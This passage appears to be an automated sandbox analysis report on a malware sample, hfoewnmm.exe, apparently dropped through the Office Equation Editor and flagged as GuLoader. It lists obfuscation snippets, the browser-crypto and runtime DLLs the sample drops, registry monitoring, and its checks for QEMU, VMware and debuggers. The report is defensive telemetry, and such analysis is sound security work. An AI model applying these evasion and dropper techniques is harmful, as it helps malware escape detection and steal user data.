Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2131093631.000000001F060000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: hfoewnmm.exe, 00000005.00000003.2131902310.000000001F280000.00000004.00000001.sdmp, nssdbm3.dll.5.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130347616.000000001FC68000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130708589.000000001FCA0000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.5.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130225554.000000001FC48000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130864345.000000001FCC4000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130962839.000000001FCEC000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130372042.000000001FC6C000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.5.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.5.dr
Source: Binary string: vcruntime140.i386.pdb source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, vcruntime140.dll.5.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130986178.000000001FCF0000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2131093631.000000001F060000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130708589.000000001FCA0000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: hfoewnmm.exe, 00000005.00000003.2131902310.000000001F280000.00000004.00000001.sdmp, nssdbm3.dll.5.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130708589.000000001FCA0000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.5.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: hfoewnmm.exe, 00000005.00000003.2128903368.000000001E854000.00000004.00000001.sdmp, msvcp140.dll.5.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2126896199.000000001FE38000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2131037127.000000001FD10000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2127011668.000000001FE38000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130372042.000000001FC6C000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2127758205.000000001FE38000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2131093631.000000001F060000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.5.dr

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: Process Memory Space: hfoewnmm.exe PID: 2528, type: MEMORY
Binary contains a suspicious time stamp
Source: initial sample Static PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
Yara detected VB6 Downloader Generic
Source: Yara match File source: Process Memory Space: hfoewnmm.exe PID: 2528, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0040544E push cs; retf 4_2_00405454
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0040586B pushad ; iretd 4_2_0040586C
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00403C00 push FFFFFFAAh; retf 4_2_00403BEC
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0040543A push cs; retf 4_2_00405440
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_004038D7 push ds; retf 4_2_004038D8
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0040594C push ds; retf 4_2_00405954
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00402566 pushad ; iretd 4_2_0040256C
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00402655 pushfd ; iretd 4_2_0040265B
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00403AD0 push esi; retf 4_2_00403AD8
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00404737 push ebx; retf 4_2_00404748
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0040233B pushad ; iretd 4_2_0040233C
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00402BD9 push ecx; retf 4_2_00402BDC
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00403BDA push FFFFFFAAh; retf 4_2_00403BEC
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00403BBD push edx; retf 4_2_00403BC4
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 5_3_1F2D850F pushfd ; ret 5_3_1F2D8517

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\hfoewnmm.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\ucrtbase.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\msvcp140.dll Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\linkscry[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File created: C:\Users\user\AppData\Local\Temp\F1ECFCF8\nss3.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: hfoewnmm.exe, 00000004.00000002.2090923974.0000000000320000.00000040.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE8
Source: hfoewnmm.exe Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Contains capabilities to detect virtual machines
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened / queried: IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0032003B rdtsc 4_2_0032003B
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
